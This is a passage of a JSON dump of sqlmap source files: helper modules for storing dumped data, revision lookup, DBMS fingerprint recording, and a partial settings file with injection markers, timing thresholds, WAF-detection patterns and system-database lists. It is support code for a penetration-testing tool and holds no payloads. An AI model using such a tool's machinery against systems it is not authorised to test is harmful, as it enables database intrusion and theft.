    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\n_readline = None\ntry:\n    from readline import *\n    import readline as _readline\nexcept:\n    try:\n        from pyreadline import *\n        import pyreadline as _readline\n    except:\n        pass\n\nfrom lib.core.data import logger\nfrom lib.core.settings import IS_WIN\nfrom lib.core.settings import PLATFORM\n\nif IS_WIN and _readline:\n    try:\n        _outputfile = _readline.GetOutputFile()\n    except AttributeError:\n        debugMsg = \"Failed GetOutputFile when using platform's \"\n        debugMsg += \"readline library\"\n        logger.debug(debugMsg)\n\n        _readline = None\n\n# Test to see if libedit is being used instead of GNU readline.\n# Thanks to Boyd Waters for this patch.\nuses_libedit = False\n\nif PLATFORM == \"mac\" and _readline:\n    import commands\n\n    (status, result) = commands.getstatusoutput(\"otool -L %s | grep libedit\" % _readline.__file__)\n\n    if status == 0 and len(result) > 0:\n        # We are bound to libedit - new in Leopard\n        _readline.parse_and_bind(\"bind ^I rl_complete\")\n\n        debugMsg = \"Leopard libedit detected when using platform's \"\n        debugMsg += \"readline library\"\n        logger.debug(debugMsg)\n\n        uses_libedit = True\n\n# the clear_history() function was only introduced in Python 2.4 and is\n# actually optional in the readline API, so we must explicitly check for its\n# existence.  Some known platforms actually don't have it.  This thread:\n# http://mail.python.org/pipermail/python-dev/2003-August/037845.html\n# has the original discussion.\nif _readline:\n    if not hasattr(_readline, \"clear_history\"):\n        def clear_history():\n            pass\n\n        _readline.clear_history = clear_history\n"
  },
  {
    "path": "sqlmap/lib/core/replication.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport sqlite3\n\nfrom lib.core.common import cleanReplaceUnicode\nfrom lib.core.common import getSafeExString\nfrom lib.core.common import unsafeSQLIdentificatorNaming\nfrom lib.core.exception import SqlmapConnectionException\nfrom lib.core.exception import SqlmapGenericException\nfrom lib.core.exception import SqlmapValueException\nfrom lib.core.settings import UNICODE_ENCODING\nfrom lib.utils.safe2bin import safechardecode\n\nclass Replication(object):\n    \"\"\"\n    This class holds all methods/classes used for database\n    replication purposes.\n    \"\"\"\n\n    def __init__(self, dbpath):\n        try:\n            self.dbpath = dbpath\n            self.connection = sqlite3.connect(dbpath)\n            self.connection.isolation_level = None\n            self.cursor = self.connection.cursor()\n        except sqlite3.OperationalError as ex:\n            errMsg = \"error occurred while opening a replication \"\n            errMsg += \"file '%s' ('%s')\" % (dbpath, getSafeExString(ex))\n            raise SqlmapConnectionException(errMsg)\n\n    class DataType(object):\n        \"\"\"\n        Using this class we define auxiliary objects\n        used for representing sqlite data types.\n        \"\"\"\n\n        def __init__(self, name):\n            self.name = name\n\n        def __str__(self):\n            return self.name\n\n        def __repr__(self):\n            return \"<DataType: %s>\" % self\n\n    class Table(object):\n        \"\"\"\n        This class defines methods used to manipulate table objects.\n        \"\"\"\n\n        def __init__(self, parent, name, columns=None, create=True, typeless=False):\n            self.parent = parent\n            self.name = unsafeSQLIdentificatorNaming(name)\n            self.columns = columns\n            if create:\n                try:\n                    self.execute('DROP TABLE IF EXISTS \"%s\"' % self.name)\n                    if not typeless:\n                        self.execute('CREATE TABLE \"%s\" (%s)' % (self.name, ','.join('\"%s\" %s' % (unsafeSQLIdentificatorNaming(colname), coltype) for colname, coltype in self.columns)))\n                    else:\n                        self.execute('CREATE TABLE \"%s\" (%s)' % (self.name, ','.join('\"%s\"' % unsafeSQLIdentificatorNaming(colname) for colname in self.columns)))\n                except Exception as ex:\n                    errMsg = \"problem occurred ('%s') while initializing the sqlite database \" % getSafeExString(ex, UNICODE_ENCODING)\n                    errMsg += \"located at '%s'\" % self.parent.dbpath\n                    raise SqlmapGenericException(errMsg)\n\n        def insert(self, values):\n            \"\"\"\n            This function is used for inserting row(s) into current table.\n            \"\"\"\n\n            if len(values) == len(self.columns):\n                self.execute('INSERT INTO \"%s\" VALUES (%s)' % (self.name, ','.join(['?'] * len(values))), safechardecode(values))\n            else:\n                errMsg = \"wrong number of columns used in replicating insert\"\n                raise SqlmapValueException(errMsg)\n\n        def execute(self, sql, parameters=None):\n            try:\n                try:\n                    self.parent.cursor.execute(sql, parameters or [])\n                except UnicodeError:\n                    self.parent.cursor.execute(sql, cleanReplaceUnicode(parameters or []))\n            except sqlite3.OperationalError as ex:\n                errMsg = \"problem occurred ('%s') while accessing sqlite database \" % getSafeExString(ex, UNICODE_ENCODING)\n                errMsg += \"located at '%s'. Please make sure that \" % self.parent.dbpath\n                errMsg += \"it's not used by some other program\"\n                raise SqlmapGenericException(errMsg)\n\n        def beginTransaction(self):\n            \"\"\"\n            Great speed improvement can be gained by using explicit transactions around multiple inserts.\n            Reference: http://stackoverflow.com/questions/4719836/python-and-sqlite3-adding-thousands-of-rows\n            \"\"\"\n            self.execute('BEGIN TRANSACTION')\n\n        def endTransaction(self):\n            self.execute('END TRANSACTION')\n\n        def select(self, condition=None):\n            \"\"\"\n            This function is used for selecting row(s) from current table.\n            \"\"\"\n            _ = 'SELECT * FROM %s' % self.name\n            if condition:\n                _ += 'WHERE %s' % condition\n            return self.execute(_)\n\n    def createTable(self, tblname, columns=None, typeless=False):\n        \"\"\"\n        This function creates Table instance with current connection settings.\n        \"\"\"\n        return Replication.Table(parent=self, name=tblname, columns=columns, typeless=typeless)\n\n    def __del__(self):\n        self.cursor.close()\n        self.connection.close()\n\n    # sqlite data types\n    NULL = DataType('NULL')\n    INTEGER = DataType('INTEGER')\n    REAL = DataType('REAL')\n    TEXT = DataType('TEXT')\n    BLOB = DataType('BLOB')\n"
  },
  {
    "path": "sqlmap/lib/core/revision.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport os\nimport re\nimport subprocess\n\nfrom lib.core.common import openFile\nfrom lib.core.convert import getText\n\ndef getRevisionNumber():\n    \"\"\"\n    Returns abbreviated commit hash number as retrieved with \"git rev-parse --short HEAD\"\n\n    >>> len(getRevisionNumber() or (' ' * 7)) == 7\n    True\n    \"\"\"\n\n    retVal = None\n    filePath = None\n    _ = os.path.dirname(__file__)\n\n    while True:\n        filePath = os.path.join(_, \".git\", \"HEAD\")\n        if os.path.exists(filePath):\n            break\n        else:\n            filePath = None\n            if _ == os.path.dirname(_):\n                break\n            else:\n                _ = os.path.dirname(_)\n\n    while True:\n        if filePath and os.path.isfile(filePath):\n            with openFile(filePath, \"r\") as f:\n                content = getText(f.read())\n                filePath = None\n\n                if content.startswith(\"ref: \"):\n                    try:\n                        filePath = os.path.join(_, \".git\", content.replace(\"ref: \", \"\")).strip()\n                    except UnicodeError:\n                        pass\n\n                if filePath is None:\n                    match = re.match(r\"(?i)[0-9a-f]{32}\", content)\n                    retVal = match.group(0) if match else None\n                    break\n        else:\n            break\n\n    if not retVal:\n        try:\n            process = subprocess.Popen(\"git rev-parse --verify HEAD\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n            stdout, _ = process.communicate()\n            match = re.search(r\"(?i)[0-9a-f]{32}\", getText(stdout or \"\"))\n            retVal = match.group(0) if match else None\n        except:\n            pass\n\n    return retVal[:7] if retVal else None\n"
  },
  {
    "path": "sqlmap/lib/core/session.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport re\n\nfrom lib.core.common import Backend\nfrom lib.core.common import Format\nfrom lib.core.common import hashDBWrite\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.enums import HASHDB_KEYS\nfrom lib.core.enums import OS\nfrom lib.core.settings import SUPPORTED_DBMS\n\ndef setDbms(dbms):\n    \"\"\"\n    @param dbms: database management system to be set into the knowledge\n    base as fingerprint.\n    @type dbms: C{str}\n    \"\"\"\n\n    hashDBWrite(HASHDB_KEYS.DBMS, dbms)\n\n    _ = \"(%s)\" % ('|'.join(SUPPORTED_DBMS))\n    _ = re.search(r\"\\A%s( |\\Z)\" % _, dbms, re.I)\n\n    if _:\n        dbms = _.group(1)\n\n    Backend.setDbms(dbms)\n    if kb.resolutionDbms:\n        hashDBWrite(HASHDB_KEYS.DBMS, kb.resolutionDbms)\n\n    logger.info(\"the back-end DBMS is %s\" % Backend.getDbms())\n\ndef setOs():\n    \"\"\"\n    Example of kb.bannerFp dictionary:\n\n    {\n      'sp': set(['Service Pack 4']),\n      'dbmsVersion': '8.00.194',\n      'dbmsServicePack': '0',\n      'distrib': set(['2000']),\n      'dbmsRelease': '2000',\n      'type': set(['Windows'])\n    }\n    \"\"\"\n\n    infoMsg = \"\"\n\n    if not kb.bannerFp:\n        return\n\n    if \"type\" in kb.bannerFp:\n        Backend.setOs(Format.humanize(kb.bannerFp[\"type\"]))\n        infoMsg = \"the back-end DBMS operating system is %s\" % Backend.getOs()\n\n    if \"distrib\" in kb.bannerFp:\n        kb.osVersion = Format.humanize(kb.bannerFp[\"distrib\"])\n        infoMsg += \" %s\" % kb.osVersion\n\n    if \"sp\" in kb.bannerFp:\n        kb.osSP = int(Format.humanize(kb.bannerFp[\"sp\"]).replace(\"Service Pack \", \"\"))\n\n    elif \"sp\" not in kb.bannerFp and Backend.isOs(OS.WINDOWS):\n        kb.osSP = 0\n\n    if Backend.getOs() and kb.osVersion and kb.osSP:\n        infoMsg += \" Service Pack %d\" % kb.osSP\n\n    if infoMsg:\n        logger.info(infoMsg)\n\n    hashDBWrite(HASHDB_KEYS.OS, Backend.getOs())\n"
  },
  {
    "path": "sqlmap/lib/core/settings.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport codecs\nimport os\nimport random\nimport re\nimport string\nimport sys\nimport time\n\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import DBMS_DIRECTORY_NAME\nfrom lib.core.enums import OS\nfrom thirdparty import six\nfrom thirdparty.six import unichr as _unichr\n\n# sqlmap version (<major>.<minor>.<month>.<monthly commit>)\nVERSION = \"1.6.9.3\"\nTYPE = \"dev\" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else \"stable\"\nTYPE_COLORS = {\"dev\": 33, \"stable\": 90, \"pip\": 34}\nVERSION_STRING = \"sqlmap/%s#%s\" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)\nDESCRIPTION = \"automatic SQL injection and database takeover tool\"\nSITE = \"https://sqlmap.org\"\nDEFAULT_USER_AGENT = \"%s (%s)\" % (VERSION_STRING, SITE)\nDEV_EMAIL_ADDRESS = \"dev@sqlmap.org\"\nISSUES_PAGE = \"https://github.com/sqlmapproject/sqlmap/issues/new\"\nGIT_REPOSITORY = \"https://github.com/sqlmapproject/sqlmap.git\"\nGIT_PAGE = \"https://github.com/sqlmapproject/sqlmap\"\nWIKI_PAGE = \"https://github.com/sqlmapproject/sqlmap/wiki/\"\nZIPBALL_PAGE = \"https://github.com/sqlmapproject/sqlmap/zipball/master\"\n\n# colorful banner\nBANNER = \"\"\"\\033[01;33m\\\n        ___\n       __H__\n ___ ___[.]_____ ___ ___  \\033[01;37m{\\033[01;%dm%s\\033[01;37m}\\033[01;33m\n|_ -| . [.]     | .'| . |\n|___|_  [.]_|_|_|__,|  _|\n      |_|V...       |_|   \\033[0m\\033[4;37m%s\\033[0m\\n\n\"\"\" % (TYPE_COLORS.get(TYPE, 31), VERSION_STRING.split('/')[-1], SITE)\n\n# Minimum distance of ratio from kb.matchRatio to result in True\nDIFF_TOLERANCE = 0.05\nCONSTANT_RATIO = 0.9\n\n# Ratio used in heuristic check for WAF/IPS protected targets\nIPS_WAF_CHECK_RATIO = 0.5\n\n# Timeout used in heuristic check for WAF/IPS protected targets\nIPS_WAF_CHECK_TIMEOUT = 10\n\n# Timeout used in checking for existence of live-cookies file\nLIVE_COOKIES_TIMEOUT = 120\n\n# Lower and upper values for match ratio in case of stable page\nLOWER_RATIO_BOUND = 0.02\nUPPER_RATIO_BOUND = 0.98\n\n# Markers for special cases when parameter values contain html encoded characters\nPARAMETER_AMP_MARKER = \"__AMP__\"\nPARAMETER_SEMICOLON_MARKER = \"__SEMICOLON__\"\nBOUNDARY_BACKSLASH_MARKER = \"__BACKSLASH__\"\nPARAMETER_PERCENTAGE_MARKER = \"__PERCENTAGE__\"\nPARTIAL_VALUE_MARKER = \"__PARTIAL_VALUE__\"\nPARTIAL_HEX_VALUE_MARKER = \"__PARTIAL_HEX_VALUE__\"\nURI_QUESTION_MARKER = \"__QUESTION__\"\nASTERISK_MARKER = \"__ASTERISK__\"\nREPLACEMENT_MARKER = \"__REPLACEMENT__\"\nBOUNDED_BASE64_MARKER = \"__BOUNDED_BASE64__\"\nBOUNDED_INJECTION_MARKER = \"__BOUNDED_INJECTION__\"\nSAFE_VARIABLE_MARKER = \"__SAFE__\"\nSAFE_HEX_MARKER = \"__SAFE_HEX__\"\nDOLLAR_MARKER = \"__DOLLAR__\"\n\nRANDOM_INTEGER_MARKER = \"[RANDINT]\"\nRANDOM_STRING_MARKER = \"[RANDSTR]\"\nSLEEP_TIME_MARKER = \"[SLEEPTIME]\"\nINFERENCE_MARKER = \"[INFERENCE]\"\nSINGLE_QUOTE_MARKER = \"[SINGLE_QUOTE]\"\nGENERIC_SQL_COMMENT_MARKER = \"[GENERIC_SQL_COMMENT]\"\n\nPAYLOAD_DELIMITER = \"__PAYLOAD_DELIMITER__\"\nCHAR_INFERENCE_MARK = \"%c\"\nPRINTABLE_CHAR_REGEX = r\"[^\\x00-\\x1f\\x7f-\\xff]\"\n\n# Regular expression used for extraction of table names (useful for (e.g.) MsAccess)\nSELECT_FROM_TABLE_REGEX = r\"\\bSELECT\\b.+?\\bFROM\\s+(?P<result>([\\w.]|`[^`<>]+`)+)\"\n\n# Regular expression used for recognition of textual content-type\nTEXT_CONTENT_TYPE_REGEX = r\"(?i)(text|form|message|xml|javascript|ecmascript|json)\"\n\n# Regular expression used for recognition of generic permission messages\nPERMISSION_DENIED_REGEX = r\"(?P<result>(command|permission|access)\\s*(was|is)?\\s*denied)\"\n\n# Regular expression used in recognition of generic protection mechanisms\nGENERIC_PROTECTION_REGEX = r\"(?i)\\b(rejected|blocked|protection|incident|denied|detected|dangerous|firewall)\\b\"\n\n# Regular expression used to detect errors in fuzz(y) UNION test\nFUZZ_UNION_ERROR_REGEX = r\"(?i)data\\s?type|comparable|compatible|conversion|converting|failed|error\"\n\n# Upper threshold for starting the fuzz(y) UNION test\nFUZZ_UNION_MAX_COLUMNS = 10\n\n# Regular expression used for recognition of generic maximum connection messages\nMAX_CONNECTIONS_REGEX = r\"\\bmax.{1,100}\\bconnection\"\n\n# Maximum consecutive connection errors before asking the user if he wants to continue\nMAX_CONSECUTIVE_CONNECTION_ERRORS = 15\n\n# Timeout before the pre-connection candidate is being disposed (because of high probability that the web server will reset it)\nPRECONNECT_CANDIDATE_TIMEOUT = 10\n\n# Servers known to cause issue with pre-connection mechanism (because of lack of multi-threaded support)\nPRECONNECT_INCOMPATIBLE_SERVERS = (\"SimpleHTTP\", \"BaseHTTP\")\n\n# Identify WAF/IPS inside limited number of responses (Note: for optimization purposes)\nIDENTYWAF_PARSE_LIMIT = 10\n\n# Maximum sleep time in \"Murphy\" (testing) mode\nMAX_MURPHY_SLEEP_TIME = 3\n\n# Regular expression used for extracting results from Google search\nGOOGLE_REGEX = r\"webcache\\.googleusercontent\\.com/search\\?q=cache:[^:]+:([^+]+)\\+&amp;cd=|url\\?\\w+=((?![^>]+webcache\\.googleusercontent\\.com)http[^>]+)&(sa=U|rct=j)\"\n\n# Google Search consent cookie\nGOOGLE_CONSENT_COOKIE = \"CONSENT=YES+shp.gws-%s-0-RC1.%s+FX+740\" % (time.strftime(\"%Y%m%d\"), \"\".join(random.sample(string.ascii_lowercase, 2)))\n\n# Regular expression used for extracting results from DuckDuckGo search\nDUCKDUCKGO_REGEX = r'<a class=\"result__url\" href=\"(htt[^\"]+)'\n\n# Regular expression used for extracting results from Bing search\nBING_REGEX = r'<h2><a href=\"([^\"]+)\" h='\n\n# Dummy user agent for search (if default one returns different results)\nDUMMY_SEARCH_USER_AGENT = \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0\"\n\n# Regular expression used for extracting content from \"textual\" tags\nTEXT_TAG_REGEX = r\"(?si)<(abbr|acronym|b|blockquote|br|center|cite|code|dt|em|font|h\\d|i|li|p|pre|q|strong|sub|sup|td|th|title|tt|u)(?!\\w).*?>(?P<result>[^<]+)\"\n\n# Regular expression used for recognition of IP addresses\nIP_ADDRESS_REGEX = r\"\\b(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\b\"\n\n# Regular expression used for recognition of generic \"your ip has been blocked\" messages\nBLOCKED_IP_REGEX = r\"(?i)(\\A|\\b)ip\\b.*\\b(banned|blocked|block list|firewall)\"\n\n# Dumping characters used in GROUP_CONCAT MySQL technique\nCONCAT_ROW_DELIMITER = ','\nCONCAT_VALUE_DELIMITER = '|'\n\n# Coefficient used for a time-based query delay checking (must be >= 7)\nTIME_STDEV_COEFF = 7\n\n# Minimum response time that can be even considered as delayed (not a complete requirement)\nMIN_VALID_DELAYED_RESPONSE = 0.5\n\n# Standard deviation after which a warning message should be displayed about connection lags\nWARN_TIME_STDEV = 0.5\n\n# Minimum length of usable union injected response (quick defense against substr fields)\nUNION_MIN_RESPONSE_CHARS = 10\n\n# Coefficient used for a union-based number of columns checking (must be >= 7)\nUNION_STDEV_COEFF = 7\n\n# Length of queue for candidates for time delay adjustment\nTIME_DELAY_CANDIDATES = 3\n\n# Default value for HTTP Accept header\nHTTP_ACCEPT_HEADER_VALUE = \"*/*\"\n\n# Default value for HTTP Accept-Encoding header\nHTTP_ACCEPT_ENCODING_HEADER_VALUE = \"gzip,deflate\"\n\n# Default timeout for running commands over backdoor\nBACKDOOR_RUN_CMD_TIMEOUT = 5\n\n# Number of seconds to wait for thread finalization at program end\nTHREAD_FINALIZATION_TIMEOUT = 1\n\n# Maximum number of techniques used in inject.py/getValue() per one value\nMAX_TECHNIQUES_PER_VALUE = 2\n\n# In case of missing piece of partial union dump, buffered array must be flushed after certain size\nMAX_BUFFERED_PARTIAL_UNION_LENGTH = 1024\n\n# Maximum size of cache used in @cachedmethod decorator\nMAX_CACHE_ITEMS = 256\n\n# Suffix used for naming meta databases in DBMS(es) without explicit database name\nMETADB_SUFFIX = \"_masterdb\"\n\n# Number of times to retry the pushValue during the exceptions (e.g. KeyboardInterrupt)\nPUSH_VALUE_EXCEPTION_RETRY_COUNT = 3\n\n# Minimum time response set needed for time-comparison based on standard deviation\nMIN_TIME_RESPONSES = 30\n\n# Maximum time response set used during time-comparison based on standard deviation\nMAX_TIME_RESPONSES = 200\n\n# Minimum comparison ratio set needed for searching valid union column number based on standard deviation\nMIN_UNION_RESPONSES = 5\n\n# After these number of blanks at the end inference should stop (just in case)\nINFERENCE_BLANK_BREAK = 5\n\n# Use this replacement character for cases when inference is not able to retrieve the proper character value\nINFERENCE_UNKNOWN_CHAR = '?'\n\n# Character used for operation \"greater\" in inference\nINFERENCE_GREATER_CHAR = \">\"\n\n# Character used for operation \"greater or equal\" in inference\nINFERENCE_GREATER_EQUALS_CHAR = \">=\"\n\n# Character used for operation \"equals\" in inference\nINFERENCE_EQUALS_CHAR = \"=\"\n\n# Character used for operation \"not-equals\" in inference\nINFERENCE_NOT_EQUALS_CHAR = \"!=\"\n\n# String used for representation of unknown DBMS\nUNKNOWN_DBMS = \"Unknown\"\n\n# String used for representation of unknown DBMS version\nUNKNOWN_DBMS_VERSION = \"Unknown\"\n\n# Dynamicity boundary length used in dynamicity removal engine\nDYNAMICITY_BOUNDARY_LENGTH = 20\n\n# Dummy user prefix used in dictionary attack\nDUMMY_USER_PREFIX = \"__dummy__\"\n\n# Reference: http://en.wikipedia.org/wiki/ISO/IEC_8859-1\nDEFAULT_PAGE_ENCODING = \"iso-8859-1\"\n\ntry:\n    codecs.lookup(DEFAULT_PAGE_ENCODING)\nexcept LookupError:\n    DEFAULT_PAGE_ENCODING = \"utf8\"\n\n# Marker for program piped input\nSTDIN_PIPE_DASH = '-'\n\n# URL used in dummy runs\nDUMMY_URL = \"http://foo/bar?id=1\"\n\n# Timeout used during initial websocket (pull) testing\nWEBSOCKET_INITIAL_TIMEOUT = 3\n\n# The name of the operating system dependent module imported. The following names have currently been registered: 'posix', 'nt', 'mac', 'os2', 'ce', 'java', 'riscos'\nPLATFORM = os.name\nPYVERSION = sys.version.split()[0]\nIS_WIN = PLATFORM == \"nt\"\n\n# Check if running in terminal\nIS_TTY = hasattr(sys.stdout, \"fileno\") and os.isatty(sys.stdout.fileno())\n\n# DBMS system databases\nMSSQL_SYSTEM_DBS = (\"Northwind\", \"master\", \"model\", \"msdb\", \"pubs\", \"tempdb\", \"Resource\", \"ReportServer\", \"ReportServerTempDB\")\nMYSQL_SYSTEM_DBS = (\"information_schema\", \"mysql\", \"performance_schema\", \"sys\")\nPGSQL_SYSTEM_DBS = (\"information_schema\", \"pg_catalog\", \"pg_toast\", \"pgagent\")\nORACLE_SYSTEM_DBS = (\"ADAMS\", \"ANONYMOUS\", \"APEX_030200\", \"APEX_PUBLIC_USER\", \"APPQOSSYS\", \"AURORA$ORB$UNAUTHENTICATED\", \"AWR_STAGE\", \"BI\", \"BLAKE\", \"CLARK\", \"CSMIG\", \"CTXSYS\", \"DBSNMP\", \"DEMO\", \"DIP\", \"DMSYS\", \"DSSYS\", \"EXFSYS\", \"FLOWS_%\", \"FLOWS_FILES\", \"HR\", \"IX\", \"JONES\", \"LBACSYS\", \"MDDATA\", \"MDSYS\", \"MGMT_VIEW\", \"OC\", \"OE\", \"OLAPSYS\", \"ORACLE_OCM\", \"ORDDATA\", \"ORDPLUGINS\", \"ORDSYS\", \"OUTLN\", \"OWBSYS\", \"PAPER\", \"PERFSTAT\", \"PM\", \"SCOTT\", \"SH\", \"SI_INFORMTN_SCHEMA\", \"SPATIAL_CSW_ADMIN_USR\", \"SPATIAL_WFS_ADMIN_USR\", \"SYS\", \"SYSMAN\", \"SYSTEM\", \"TRACESVR\", \"TSMSYS\", \"WK_TEST\", \"WKPROXY\", \"WKSYS\", \"WMSYS\", \"XDB\", \"XS$NULL\")\nSQLITE_SYSTEM_DBS = (\"sqlite_master\", \"sqlite_temp_master\")\nACCESS_SYSTEM_DBS = (\"MSysAccessObjects\", \"MSysACEs\", \"MSysObjects\", \"MSysQueries\", \"MSysRelationships\", \"MSysAccessStorage\", \"MSysAccessXML\", \"MSysModules\", \"MSysModules2\")\nFIREBIRD_SYSTEM_DBS = (\"RDB$BACKUP_HISTORY\", \"RDB$CHARACTER_SETS\", \"RDB$CHECK_CONSTRAINTS\", \"RDB$COLLATIONS\", \"RDB$DATABASE\", \"RDB$DEPENDENCIES\", \"RDB$EXCEPTIONS\", \"RDB$FIELDS\", \"RDB$FIELD_DIMENSIONS\", \" RDB$FILES\", \"RDB$FILTERS\", \"RDB$FORMATS\", \"RDB$FUNCTIONS\", \"RDB$FUNCTION_ARGUMENTS\", \"RDB$GENERATORS\", \"RDB$INDEX_SEGMENTS\", \"RDB$INDICES\", \"RDB$LOG_FILES\", \"RDB$PAGES\", \"RDB$PROCEDURES\", \"RDB$PROCEDURE_PARAMETERS\", \"RDB$REF_CONSTRAINTS\", \"RDB$RELATIONS\", \"RDB$RELATION_CONSTRAINTS\", \"RDB$RELATION_FIELDS\", \"RDB$ROLES\", \"RDB$SECURITY_CLASSES\", \"RDB$TRANSACTIONS\", \"RDB$TRIGGERS\", \"RDB$TRIGGER_MESSAGES\", \"RDB$TYPES\", \"RDB$USER_PRIVILEGES\", \"RDB$VIEW_RELATIONS\")\nMAXDB_SYSTEM_DBS = (\"SYSINFO\", \"DOMAIN\")\nSYBASE_SYSTEM_DBS = (\"master\", \"model\", \"sybsystemdb\", \"sybsystemprocs\")\nDB2_SYSTEM_DBS = (\"NULLID\", \"SQLJ\", \"SYSCAT\", \"SYSFUN\", \"SYSIBM\", \"SYSIBMADM\", \"SYSIBMINTERNAL\", \"SYSIBMTS\", \"SYSPROC\", \"SYSPUBLIC\", \"SYSSTAT\", \"SYSTOOLS\")\nHSQLDB_SYSTEM_DBS = (\"INFORMATION_SCHEMA\", \"SYSTEM_LOB\")\nH2_SYSTEM_DBS = (\"INFORMATION_SCHEMA\",) + (\"IGNITE\", \"ignite-sys-cache\")\nINFORMIX_SYSTEM_DBS = (\"sysmaster\", \"sysutils\", \"sysuser\", \"sysadmin\")\nMONETDB_SYSTEM_DBS = (\"tmp\", \"json\", \"profiler\")\nDERBY_SYSTEM_DBS = (\"NULLID\", \"SQLJ\", \"SYS\", \"SYSCAT\", \"SYSCS_DIAG\", \"SYSCS_UTIL\", \"SYSFUN\", \"SYSIBM\", \"SYSPROC\", \"SYSSTAT\")\nVERTICA_SYSTEM_DBS = (\"v_catalog\", \"v_internal\", \"v_monitor\",)\nMCKOI_SYSTEM_DBS = (\"\",)\nPRESTO_SYSTEM_DBS = (\"information_schema\",)\nALTIBASE_SYSTEM_DBS = (\"SYSTEM_\",)\nMIMERSQL_SYSTEM_DBS = (\"information_schema\", \"SYSTEM\",)\nCRATEDB_SYSTEM_DBS = (\"information_schema\", \"pg_catalog\", \"sys\")\nCUBRID_SYSTEM_DBS = (\"DBA\",)\nCACHE_SYSTEM_DBS = (\"%Dictionary\", \"INFORMATION_SCHEMA\", \"%SYS\")\nEXTREMEDB_SYSTEM_DBS = (\"\",)\nFRONTBASE_SYSTEM_DBS = (\"DEFINITION_SCHEMA\", \"INFORMATION_SCHEMA\")\nRAIMA_SYSTEM_DBS = (\"\",)\nVIRTUOSO_SYSTEM_DBS = (\"\",)\n\n# Note: (<regular>) + (<forks>)\nMSSQL_ALIASES = (\"microsoft sql server\", \"mssqlserver\", \"mssql\", \"ms\")\nMYSQL_ALIASES = (\"mysql\", \"my\") + (\"mariadb\", \"maria\", \"memsql\", \"tidb\", \"percona\", \"drizzle\")\nPGSQL_ALIASES = (\"postgresql\", \"postgres\", \"pgsql\", \"psql\", \"pg\") + (\"cockroach\", \"cockroachdb\", \"amazon redshift\", \"redshift\", \"greenplum\", \"yellowbrick\", \"enterprisedb\", \"yugabyte\", \"yugabytedb\")\nORACLE_ALIASES = (\"oracle\", \"orcl\", \"ora\", \"or\")\nSQLITE_ALIASES = (\"sqlite\", \"sqlite3\")\nACCESS_ALIASES = (\"microsoft access\", \"msaccess\", \"access\", \"jet\")\nFIREBIRD_ALIASES = (\"firebird\", \"mozilla firebird\", \"interbase\", \"ibase\", \"fb\")\nMAXDB_ALIASES = (\"max\", \"maxdb\", \"sap maxdb\", \"sap db\")\nSYBASE_ALIASES = (\"sybase\", \"sybase sql server\")\nDB2_ALIASES = (\"db2\", \"ibm db2\", \"ibmdb2\")\nHSQLDB_ALIASES = (\"hsql\", \"hsqldb\", \"hs\", \"hypersql\")\nH2_ALIASES = (\"h2\",) + (\"ignite\", \"apache ignite\")\nINFORMIX_ALIASES = (\"informix\", \"ibm informix\", \"ibminformix\")\nMONETDB_ALIASES = (\"monet\", \"monetdb\",)\nDERBY_ALIASES = (\"derby\", \"apache derby\",)\nVERTICA_ALIASES = (\"vertica\",)\nMCKOI_ALIASES = (\"mckoi\",)\nPRESTO_ALIASES = (\"presto\",)\nALTIBASE_ALIASES = (\"altibase\",)\nMIMERSQL_ALIASES = (\"mimersql\", \"mimer\")\nCRATEDB_ALIASES = (\"cratedb\", \"crate\")\nCUBRID_ALIASES = (\"cubrid\",)\nCACHE_ALIASES = (\"intersystems cache\", \"cachedb\", \"cache\", \"iris\")\nEXTREMEDB_ALIASES = (\"extremedb\", \"extreme\")\nFRONTBASE_ALIASES = (\"frontbase\",)\nRAIMA_ALIASES = (\"raima database manager\", \"raima\", \"raimadb\", \"raimadm\", \"rdm\", \"rds\", \"velocis\")\nVIRTUOSO_ALIASES = (\"virtuoso\", \"openlink virtuoso\")\n\nDBMS_DIRECTORY_DICT = dict((getattr(DBMS, _), getattr(DBMS_DIRECTORY_NAME, _)) for _ in dir(DBMS) if not _.startswith(\"_\"))\n\nSUPPORTED_DBMS = set(MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES + H2_ALIASES + INFORMIX_ALIASES + MONETDB_ALIASES + DERBY_ALIASES + VERTICA_ALIASES + MCKOI_ALIASES + PRESTO_ALIASES + ALTIBASE_ALIASES + MIMERSQL_ALIASES + CRATEDB_ALIASES + CUBRID_ALIASES + CACHE_ALIASES + EXTREMEDB_ALIASES + RAIMA_ALIASES + VIRTUOSO_ALIASES)\nSUPPORTED_OS = (\"linux\", \"windows\")\n\nDBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, 